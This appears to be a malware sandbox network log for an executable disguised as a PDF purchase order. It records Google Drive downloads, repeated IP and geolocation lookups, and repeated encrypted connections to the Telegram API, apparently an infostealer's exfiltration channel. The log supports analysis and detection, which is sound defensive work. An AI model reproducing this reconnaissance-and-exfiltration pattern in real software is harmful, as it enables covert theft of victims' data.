                                                                                                                                  Dec 19, 2024 15:30:45.855632067 CET4992380192.168.2.5132.226.247.73
                                                                                                                                  Dec 19, 2024 15:30:45.857657909 CET4993180192.168.2.5132.226.247.73
                                                                                                                                  Dec 19, 2024 15:30:45.975850105 CET8049923132.226.247.73192.168.2.5
                                                                                                                                  Dec 19, 2024 15:30:45.975955009 CET4992380192.168.2.5132.226.247.73
                                                                                                                                  Dec 19, 2024 15:30:45.977206945 CET8049931132.226.247.73192.168.2.5
                                                                                                                                  Dec 19, 2024 15:30:45.977289915 CET4993180192.168.2.5132.226.247.73
                                                                                                                                  Dec 19, 2024 15:30:45.977520943 CET4993180192.168.2.5132.226.247.73
                                                                                                                                  Dec 19, 2024 15:30:46.097132921 CET8049931132.226.247.73192.168.2.5
                                                                                                                                  Dec 19, 2024 15:30:48.282063961 CET8049931132.226.247.73192.168.2.5
                                                                                                                                  Dec 19, 2024 15:30:48.283658981 CET49937443192.168.2.5149.154.167.220
                                                                                                                                  Dec 19, 2024 15:30:48.283729076 CET44349937149.154.167.220192.168.2.5
                                                                                                                                  Dec 19, 2024 15:30:48.283823967 CET49937443192.168.2.5149.154.167.220
                                                                                                                                  Dec 19, 2024 15:30:48.284146070 CET49937443192.168.2.5149.154.167.220
                                                                                                                                  Dec 19, 2024 15:30:48.284173965 CET44349937149.154.167.220192.168.2.5
                                                                                                                                  Dec 19, 2024 15:30:48.335469007 CET4993180192.168.2.5132.226.247.73
                                                                                                                                  Dec 19, 2024 15:30:48.794163942 CET8049761132.226.247.73192.168.2.5
                                                                                                                                  Dec 19, 2024 15:30:48.794279099 CET4976180192.168.2.5132.226.247.73
                                                                                                                                  Dec 19, 2024 15:30:49.652604103 CET44349937149.154.167.220192.168.2.5
                                                                                                                                  Dec 19, 2024 15:30:49.654329062 CET49937443192.168.2.5149.154.167.220
                                                                                                                                  Dec 19, 2024 15:30:49.654409885 CET44349937149.154.167.220192.168.2.5
                                                                                                                                  Dec 19, 2024 15:30:49.654505014 CET49937443192.168.2.5149.154.167.220
                                                                                                                                  Dec 19, 2024 15:30:49.654520035 CET44349937149.154.167.220192.168.2.5
                                                                                                                                  Dec 19, 2024 15:30:50.316178083 CET44349937149.154.167.220192.168.2.5
                                                                                                                                  Dec 19, 2024 15:30:50.316272020 CET44349937149.154.167.220192.168.2.5
                                                                                                                                  Dec 19, 2024 15:30:50.316344023 CET49937443192.168.2.5149.154.167.220
                                                                                                                                  Dec 19, 2024 15:30:50.316999912 CET49937443192.168.2.5149.154.167.220
                                                                                                                                  Dec 19, 2024 15:30:50.321760893 CET4993180192.168.2.5132.226.247.73
                                                                                                                                  Dec 19, 2024 15:30:50.323159933 CET4994280192.168.2.5132.226.247.73
                                                                                                                                  Dec 19, 2024 15:30:50.443751097 CET8049931132.226.247.73192.168.2.5
                                                                                                                                  Dec 19, 2024 15:30:50.443824053 CET4993180192.168.2.5132.226.247.73
                                                                                                                                  Dec 19, 2024 15:30:50.445051908 CET8049942132.226.247.73192.168.2.5
                                                                                                                                  Dec 19, 2024 15:30:50.445144892 CET4994280192.168.2.5132.226.247.73
                                                                                                                                  Dec 19, 2024 15:30:50.445310116 CET4994280192.168.2.5132.226.247.73
                                                                                                                                  Dec 19, 2024 15:30:50.569422960 CET8049942132.226.247.73192.168.2.5
                                                                                                                                  Dec 19, 2024 15:30:51.756139040 CET8049942132.226.247.73192.168.2.5
                                                                                                                                  Dec 19, 2024 15:30:51.758093119 CET49947443192.168.2.5149.154.167.220
                                                                                                                                  Dec 19, 2024 15:30:51.758119106 CET44349947149.154.167.220192.168.2.5
                                                                                                                                  Dec 19, 2024 15:30:51.758219957 CET49947443192.168.2.5149.154.167.220
                                                                                                                                  Dec 19, 2024 15:30:51.758519888 CET49947443192.168.2.5149.154.167.220
                                                                                                                                  Dec 19, 2024 15:30:51.758531094 CET44349947149.154.167.220192.168.2.5
                                                                                                                                  Dec 19, 2024 15:30:51.804204941 CET4994280192.168.2.5132.226.247.73
                                                                                                                                  Dec 19, 2024 15:30:53.128321886 CET44349947149.154.167.220192.168.2.5
                                                                                                                                  Dec 19, 2024 15:30:53.130317926 CET49947443192.168.2.5149.154.167.220
                                                                                                                                  Dec 19, 2024 15:30:53.130340099 CET44349947149.154.167.220192.168.2.5
                                                                                                                                  Dec 19, 2024 15:30:53.130436897 CET49947443192.168.2.5149.154.167.220
                                                                                                                                  Dec 19, 2024 15:30:53.130443096 CET44349947149.154.167.220192.168.2.5
                                                                                                                                  Dec 19, 2024 15:30:53.779226065 CET44349947149.154.167.220192.168.2.5
                                                                                                                                  Dec 19, 2024 15:30:53.779316902 CET44349947149.154.167.220192.168.2.5
                                                                                                                                  Dec 19, 2024 15:30:53.779627085 CET49947443192.168.2.5149.154.167.220
                                                                                                                                  Dec 19, 2024 15:30:53.779908895 CET49947443192.168.2.5149.154.167.220
                                                                                                                                  Dec 19, 2024 15:30:53.783374071 CET4994280192.168.2.5132.226.247.73
                                                                                                                                  Dec 19, 2024 15:30:53.784164906 CET4995280192.168.2.5132.226.247.73
                                                                                                                                  Dec 19, 2024 15:30:53.903666973 CET8049942132.226.247.73192.168.2.5
                                                                                                                                  Dec 19, 2024 15:30:53.903712988 CET8049952132.226.247.73192.168.2.5
                                                                                                                                  Dec 19, 2024 15:30:53.903769970 CET4994280192.168.2.5132.226.247.73
                                                                                                                                  Dec 19, 2024 15:30:53.903803110 CET4995280192.168.2.5132.226.247.73
                                                                                                                                  Dec 19, 2024 15:30:53.903964043 CET4995280192.168.2.5132.226.247.73
                                                                                                                                  Dec 19, 2024 15:30:54.023660898 CET8049952132.226.247.73192.168.2.5
                                                                                                                                  Dec 19, 2024 15:30:55.210642099 CET8049952132.226.247.73192.168.2.5
                                                                                                                                  Dec 19, 2024 15:30:55.236578941 CET49955443192.168.2.5149.154.167.220
                                                                                                                                  Dec 19, 2024 15:30:55.236685991 CET44349955149.154.167.220192.168.2.5
                                                                                                                                  Dec 19, 2024 15:30:55.236766100 CET49955443192.168.2.5149.154.167.220
                                                                                                                                  Dec 19, 2024 15:30:55.237215996 CET49955443192.168.2.5149.154.167.220
                                                                                                                                  Dec 19, 2024 15:30:55.237251043 CET44349955149.154.167.220192.168.2.5
                                                                                                                                  Dec 19, 2024 15:30:55.257339954 CET4995280192.168.2.5132.226.247.73
                                                                                                                                  Dec 19, 2024 15:30:56.601099014 CET44349955149.154.167.220192.168.2.5
                                                                                                                                  Dec 19, 2024 15:30:56.603755951 CET49955443192.168.2.5149.154.167.220
                                                                                                                                  Dec 19, 2024 15:30:56.603801012 CET44349955149.154.167.220192.168.2.5
                                                                                                                                  Dec 19, 2024 15:30:56.603945971 CET49955443192.168.2.5149.154.167.220
                                                                                                                                  Dec 19, 2024 15:30:56.603952885 CET44349955149.154.167.220192.168.2.5
                                                                                                                                  Dec 19, 2024 15:30:57.250334978 CET44349955149.154.167.220192.168.2.5
                                                                                                                                  Dec 19, 2024 15:30:57.251780033 CET44349955149.154.167.220192.168.2.5
                                                                                                                                  Dec 19, 2024 15:30:57.251878023 CET49955443192.168.2.5149.154.167.220
                                                                                                                                  Dec 19, 2024 15:30:57.252789021 CET49955443192.168.2.5149.154.167.220
                                                                                                                                  Dec 19, 2024 15:30:57.259572029 CET4995280192.168.2.5132.226.247.73
                                                                                                                                  Dec 19, 2024 15:30:57.261198997 CET4996180192.168.2.5132.226.247.73
                                                                                                                                  Dec 19, 2024 15:30:57.379476070 CET8049952132.226.247.73192.168.2.5
                                                                                                                                  Dec 19, 2024 15:30:57.379539013 CET4995280192.168.2.5132.226.247.73
                                                                                                                                  Dec 19, 2024 15:30:57.380826950 CET8049961132.226.247.73192.168.2.5
                                                                                                                                  Dec 19, 2024 15:30:57.380903006 CET4996180192.168.2.5132.226.247.73
                                                                                                                                  Dec 19, 2024 15:30:57.381041050 CET4996180192.168.2.5132.226.247.73
                                                                                                                                  Dec 19, 2024 15:30:57.500644922 CET8049961132.226.247.73192.168.2.5
                                                                                                                                  Dec 19, 2024 15:30:59.684894085 CET8049961132.226.247.73192.168.2.5
                                                                                                                                  Dec 19, 2024 15:30:59.686619043 CET49967443192.168.2.5149.154.167.220
                                                                                                                                  Dec 19, 2024 15:30:59.686674118 CET44349967149.154.167.220192.168.2.5
                                                                                                                                  Dec 19, 2024 15:30:59.686822891 CET49967443192.168.2.5149.154.167.220
                                                                                                                                  Dec 19, 2024 15:30:59.687220097 CET49967443192.168.2.5149.154.167.220
                                                                                                                                  Dec 19, 2024 15:30:59.687232018 CET44349967149.154.167.220192.168.2.5
                                                                                                                                  Dec 19, 2024 15:30:59.726094007 CET4996180192.168.2.5132.226.247.73
                                                                                                                                  Dec 19, 2024 15:31:01.052758932 CET44349967149.154.167.220192.168.2.5
                                                                                                                                  Dec 19, 2024 15:31:01.080029964 CET49967443192.168.2.5149.154.167.220
                                                                                                                                  Dec 19, 2024 15:31:01.080056906 CET44349967149.154.167.220192.168.2.5
                                                                                                                                  Dec 19, 2024 15:31:01.080122948 CET49967443192.168.2.5149.154.167.220
                                                                                                                                  Dec 19, 2024 15:31:01.080127954 CET44349967149.154.167.220192.168.2.5
                                                                                                                                  Dec 19, 2024 15:31:01.789340973 CET44349967149.154.167.220192.168.2.5
                                                                                                                                  Dec 19, 2024 15:31:01.789412975 CET44349967149.154.167.220192.168.2.5
                                                                                                                                  Dec 19, 2024 15:31:01.789464951 CET49967443192.168.2.5149.154.167.220
                                                                                                                                  Dec 19, 2024 15:31:01.792789936 CET49967443192.168.2.5149.154.167.220
                                                                                                                                  Dec 19, 2024 15:31:01.804651976 CET4996180192.168.2.5132.226.247.73
                                                                                                                                  Dec 19, 2024 15:31:01.806581974 CET4997380192.168.2.5132.226.247.73
                                                                                                                                  Dec 19, 2024 15:31:01.924550056 CET8049961132.226.247.73192.168.2.5
                                                                                                                                  Dec 19, 2024 15:31:01.924611092 CET4996180192.168.2.5132.226.247.73
                                                                                                                                  Dec 19, 2024 15:31:01.927634001 CET8049973132.226.247.73192.168.2.5
                                                                                                                                  Dec 19, 2024 15:31:01.927705050 CET4997380192.168.2.5132.226.247.73
                                                                                                                                  Dec 19, 2024 15:31:01.950740099 CET4997380192.168.2.5132.226.247.73
                                                                                                                                  Dec 19, 2024 15:31:02.070529938 CET8049973132.226.247.73192.168.2.5
                                                                                                                                  Dec 19, 2024 15:31:03.239947081 CET8049973132.226.247.73192.168.2.5
                                                                                                                                  Dec 19, 2024 15:31:03.241168976 CET49979443192.168.2.5149.154.167.220
                                                                                                                                  Dec 19, 2024 15:31:03.241202116 CET44349979149.154.167.220192.168.2.5
                                                                                                                                  Dec 19, 2024 15:31:03.241265059 CET49979443192.168.2.5149.154.167.220
                                                                                                                                  Dec 19, 2024 15:31:03.241527081 CET49979443192.168.2.5149.154.167.220
                                                                                                                                  Dec 19, 2024 15:31:03.241538048 CET44349979149.154.167.220192.168.2.5
                                                                                                                                  Dec 19, 2024 15:31:03.288630962 CET4997380192.168.2.5132.226.247.73
                                                                                                                                  Dec 19, 2024 15:31:04.775685072 CET44349979149.154.167.220192.168.2.5
                                                                                                                                  Dec 19, 2024 15:31:04.819873095 CET49979443192.168.2.5149.154.167.220
                                                                                                                                  Dec 19, 2024 15:31:06.405047894 CET49979443192.168.2.5149.154.167.220
                                                                                                                                  Dec 19, 2024 15:31:06.405069113 CET44349979149.154.167.220192.168.2.5
                                                                                                                                  Dec 19, 2024 15:31:06.405153036 CET49979443192.168.2.5149.154.167.220
                                                                                                                                  Dec 19, 2024 15:31:06.405160904 CET44349979149.154.167.220192.168.2.5
                                                                                                                                  Dec 19, 2024 15:31:07.086625099 CET44349979149.154.167.220192.168.2.5
                                                                                                                                  Dec 19, 2024 15:31:07.086819887 CET44349979149.154.167.220192.168.2.5
                                                                                                                                  Dec 19, 2024 15:31:07.087083101 CET49979443192.168.2.5149.154.167.220
                                                                                                                                  TimestampSource PortDest PortSource IPDest IP
                                                                                                                                  Dec 19, 2024 15:29:20.939297915 CET5152453192.168.2.51.1.1.1
                                                                                                                                  Dec 19, 2024 15:29:21.076962948 CET53515241.1.1.1192.168.2.5
                                                                                                                                  Dec 19, 2024 15:29:23.930536032 CET5151153192.168.2.51.1.1.1
                                                                                                                                  Dec 19, 2024 15:29:24.069997072 CET53515111.1.1.1192.168.2.5
                                                                                                                                  Dec 19, 2024 15:29:29.782740116 CET6100653192.168.2.51.1.1.1
                                                                                                                                  Dec 19, 2024 15:29:29.919830084 CET53610061.1.1.1192.168.2.5
                                                                                                                                  Dec 19, 2024 15:29:32.160598993 CET6236253192.168.2.51.1.1.1
                                                                                                                                  Dec 19, 2024 15:29:32.305747986 CET53623621.1.1.1192.168.2.5
                                                                                                                                  Dec 19, 2024 15:29:39.969598055 CET5479853192.168.2.51.1.1.1
                                                                                                                                  Dec 19, 2024 15:29:40.107425928 CET53547981.1.1.1192.168.2.5
                                                                                                                                  Dec 19, 2024 15:30:40.116313934 CET5527453192.168.2.51.1.1.1
                                                                                                                                  Dec 19, 2024 15:30:40.337245941 CET53552741.1.1.1192.168.2.5
                                                                                                                                  TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                                  Dec 19, 2024 15:29:20.939297915 CET192.168.2.51.1.1.10xca5Standard query (0)drive.google.comA (IP address)IN (0x0001)false
                                                                                                                                  Dec 19, 2024 15:29:23.930536032 CET192.168.2.51.1.1.10x3bfaStandard query (0)drive.usercontent.google.comA (IP address)IN (0x0001)false
                                                                                                                                  Dec 19, 2024 15:29:29.782740116 CET192.168.2.51.1.1.10x2b9Standard query (0)checkip.dyndns.orgA (IP address)IN (0x0001)false
                                                                                                                                  Dec 19, 2024 15:29:32.160598993 CET192.168.2.51.1.1.10x25a1Standard query (0)reallyfreegeoip.orgA (IP address)IN (0x0001)false
                                                                                                                                  Dec 19, 2024 15:29:39.969598055 CET192.168.2.51.1.1.10xd70cStandard query (0)api.telegram.orgA (IP address)IN (0x0001)false
                                                                                                                                  Dec 19, 2024 15:30:40.116313934 CET192.168.2.51.1.1.10xfe4dStandard query (0)api.telegram.orgA (IP address)IN (0x0001)false
                                                                                                                                  TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                                  Dec 19, 2024 15:29:21.076962948 CET1.1.1.1192.168.2.50xca5No error (0)drive.google.com216.58.208.238A (IP address)IN (0x0001)false
                                                                                                                                  Dec 19, 2024 15:29:24.069997072 CET1.1.1.1192.168.2.50x3bfaNo error (0)drive.usercontent.google.com172.217.17.65A (IP address)IN (0x0001)false
                                                                                                                                  Dec 19, 2024 15:29:29.919830084 CET1.1.1.1192.168.2.50x2b9No error (0)checkip.dyndns.orgcheckip.dyndns.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                  Dec 19, 2024 15:29:29.919830084 CET1.1.1.1192.168.2.50x2b9No error (0)checkip.dyndns.com132.226.247.73A (IP address)IN (0x0001)false
                                                                                                                                  Dec 19, 2024 15:29:29.919830084 CET1.1.1.1192.168.2.50x2b9No error (0)checkip.dyndns.com132.226.8.169A (IP address)IN (0x0001)false
                                                                                                                                  Dec 19, 2024 15:29:29.919830084 CET1.1.1.1192.168.2.50x2b9No error (0)checkip.dyndns.com158.101.44.242A (IP address)IN (0x0001)false
                                                                                                                                  Dec 19, 2024 15:29:29.919830084 CET1.1.1.1192.168.2.50x2b9No error (0)checkip.dyndns.com193.122.6.168A (IP address)IN (0x0001)false
                                                                                                                                  Dec 19, 2024 15:29:29.919830084 CET1.1.1.1192.168.2.50x2b9No error (0)checkip.dyndns.com193.122.130.0A (IP address)IN (0x0001)false
                                                                                                                                  Dec 19, 2024 15:29:32.305747986 CET1.1.1.1192.168.2.50x25a1No error (0)reallyfreegeoip.org104.21.67.152A (IP address)IN (0x0001)false
                                                                                                                                  Dec 19, 2024 15:29:32.305747986 CET1.1.1.1192.168.2.50x25a1No error (0)reallyfreegeoip.org172.67.177.134A (IP address)IN (0x0001)false
                                                                                                                                  Dec 19, 2024 15:29:40.107425928 CET1.1.1.1192.168.2.50xd70cNo error (0)api.telegram.org149.154.167.220A (IP address)IN (0x0001)false
                                                                                                                                  Dec 19, 2024 15:30:40.337245941 CET1.1.1.1192.168.2.50xfe4dNo error (0)api.telegram.org149.154.167.220A (IP address)IN (0x0001)false
                                                                                                                                  • drive.google.com
                                                                                                                                  • drive.usercontent.google.com
                                                                                                                                  • reallyfreegeoip.org
                                                                                                                                  • api.telegram.org
                                                                                                                                  • checkip.dyndns.org
                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                  0192.168.2.549733132.226.247.73804796C:\Users\user\Desktop\PURCHASE ORDER TRC-090971819130-24_pdf.exe
                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                  Dec 19, 2024 15:29:30.046780109 CET151OUTGET / HTTP/1.1
                                                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                                  Host: checkip.dyndns.org
                                                                                                                                  Connection: Keep-Alive
                                                                                                                                  Dec 19, 2024 15:29:31.375972986 CET321INHTTP/1.1 200 OK
                                                                                                                                  Date: Thu, 19 Dec 2024 14:29:31 GMT
                                                                                                                                  Content-Type: text/html
                                                                                                                                  Content-Length: 104
                                                                                                                                  Connection: keep-alive
                                                                                                                                  Cache-Control: no-cache
                                                                                                                                  Pragma: no-cache
                                                                                                                                  X-Request-ID: 1084d967f12af3d5426628ad11a20812
                                                                                                                                  Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                  Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>
                                                                                                                                  Dec 19, 2024 15:29:31.381685019 CET127OUTGET / HTTP/1.1
                                                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                                  Host: checkip.dyndns.org
                                                                                                                                  Dec 19, 2024 15:29:31.858283043 CET321INHTTP/1.1 200 OK
                                                                                                                                  Date: Thu, 19 Dec 2024 14:29:31 GMT
                                                                                                                                  Content-Type: text/html
                                                                                                                                  Content-Length: 104
                                                                                                                                  Connection: keep-alive
                                                                                                                                  Cache-Control: no-cache
                                                                                                                                  Pragma: no-cache
                                                                                                                                  X-Request-ID: d4ae3ba230b1760d33d9212c7dffdb57
                                                                                                                                  Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                  Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>
                                                                                                                                  Dec 19, 2024 15:29:39.514564991 CET127OUTGET / HTTP/1.1
                                                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                                  Host: checkip.dyndns.org
                                                                                                                                  Dec 19, 2024 15:29:39.965440035 CET321INHTTP/1.1 200 OK
                                                                                                                                  Date: Thu, 19 Dec 2024 14:29:39 GMT
                                                                                                                                  Content-Type: text/html
                                                                                                                                  Content-Length: 104
                                                                                                                                  Connection: keep-alive
                                                                                                                                  Cache-Control: no-cache
                                                                                                                                  Pragma: no-cache
                                                                                                                                  X-Request-ID: eff6cccc9394ea7327b93da11469335b
                                                                                                                                  Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                  Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                  1192.168.2.549761132.226.247.73804796C:\Users\user\Desktop\PURCHASE ORDER TRC-090971819130-24_pdf.exe
                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                  Dec 19, 2024 15:29:42.443367004 CET127OUTGET / HTTP/1.1
                                                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                                  Host: checkip.dyndns.org
                                                                                                                                  Dec 19, 2024 15:29:43.795205116 CET321INHTTP/1.1 200 OK
                                                                                                                                  Date: Thu, 19 Dec 2024 14:29:43 GMT
                                                                                                                                  Content-Type: text/html
                                                                                                                                  Content-Length: 104
                                                                                                                                  Connection: keep-alive
                                                                                                                                  Cache-Control: no-cache
                                                                                                                                  Pragma: no-cache
                                                                                                                                  X-Request-ID: a24f3dc5af1066135f8ab3a026968abe
                                                                                                                                  Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                  Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                  2192.168.2.549772132.226.247.73804796C:\Users\user\Desktop\PURCHASE ORDER TRC-090971819130-24_pdf.exe
                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                  Dec 19, 2024 15:29:46.028143883 CET151OUTGET / HTTP/1.1
                                                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                                  Host: checkip.dyndns.org
                                                                                                                                  Connection: Keep-Alive
                                                                                                                                  Dec 19, 2024 15:29:47.349688053 CET321INHTTP/1.1 200 OK
                                                                                                                                  Date: Thu, 19 Dec 2024 14:29:47 GMT
                                                                                                                                  Content-Type: text/html
                                                                                                                                  Content-Length: 104
                                                                                                                                  Connection: keep-alive
                                                                                                                                  Cache-Control: no-cache
                                                                                                                                  Pragma: no-cache
                                                                                                                                  X-Request-ID: 6c52f9d02659fce1e553fe782006e0a7
                                                                                                                                  Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                  Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                  3192.168.2.549781132.226.247.73804796C:\Users\user\Desktop\PURCHASE ORDER TRC-090971819130-24_pdf.exe
                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                  Dec 19, 2024 15:29:49.521976948 CET151OUTGET / HTTP/1.1
                                                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                                  Host: checkip.dyndns.org
                                                                                                                                  Connection: Keep-Alive
                                                                                                                                  Dec 19, 2024 15:29:50.827419996 CET321INHTTP/1.1 200 OK
                                                                                                                                  Date: Thu, 19 Dec 2024 14:29:50 GMT
                                                                                                                                  Content-Type: text/html
                                                                                                                                  Content-Length: 104
                                                                                                                                  Connection: keep-alive
                                                                                                                                  Cache-Control: no-cache
                                                                                                                                  Pragma: no-cache
                                                                                                                                  X-Request-ID: bdfe6f16ea2bc101b05afd8f5c6f8959
                                                                                                                                  Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                  Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                  4192.168.2.549791132.226.247.73804796C:\Users\user\Desktop\PURCHASE ORDER TRC-090971819130-24_pdf.exe
                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                  Dec 19, 2024 15:29:53.120652914 CET151OUTGET / HTTP/1.1
                                                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                                  Host: checkip.dyndns.org
                                                                                                                                  Connection: Keep-Alive
                                                                                                                                  Dec 19, 2024 15:29:54.436521053 CET321INHTTP/1.1 200 OK
                                                                                                                                  Date: Thu, 19 Dec 2024 14:29:54 GMT
                                                                                                                                  Content-Type: text/html
                                                                                                                                  Content-Length: 104
                                                                                                                                  Connection: keep-alive
                                                                                                                                  Cache-Control: no-cache
                                                                                                                                  Pragma: no-cache
                                                                                                                                  X-Request-ID: 4237baf2cc929753c5f89b919ca5c90b
                                                                                                                                  Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                  Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                  5192.168.2.549802132.226.247.73804796C:\Users\user\Desktop\PURCHASE ORDER TRC-090971819130-24_pdf.exe
                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                  Dec 19, 2024 15:29:56.689657927 CET151OUTGET / HTTP/1.1
                                                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                                  Host: checkip.dyndns.org
                                                                                                                                  Connection: Keep-Alive
                                                                                                                                  Dec 19, 2024 15:29:58.008605003 CET321INHTTP/1.1 200 OK
                                                                                                                                  Date: Thu, 19 Dec 2024 14:29:57 GMT
                                                                                                                                  Content-Type: text/html
                                                                                                                                  Content-Length: 104
                                                                                                                                  Connection: keep-alive
                                                                                                                                  Cache-Control: no-cache
                                                                                                                                  Pragma: no-cache
                                                                                                                                  X-Request-ID: 3bd6469774720e444cd4a5540a29e925
                                                                                                                                  Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                  Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                  6192.168.2.549811132.226.247.73804796C:\Users\user\Desktop\PURCHASE ORDER TRC-090971819130-24_pdf.exe
                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                  Dec 19, 2024 15:30:00.156553030 CET151OUTGET / HTTP/1.1
                                                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                                  Host: checkip.dyndns.org
                                                                                                                                  Connection: Keep-Alive
                                                                                                                                  Dec 19, 2024 15:30:06.891166925 CET321INHTTP/1.1 200 OK
                                                                                                                                  Date: Thu, 19 Dec 2024 14:30:06 GMT
                                                                                                                                  Content-Type: text/html
                                                                                                                                  Content-Length: 104
                                                                                                                                  Connection: keep-alive
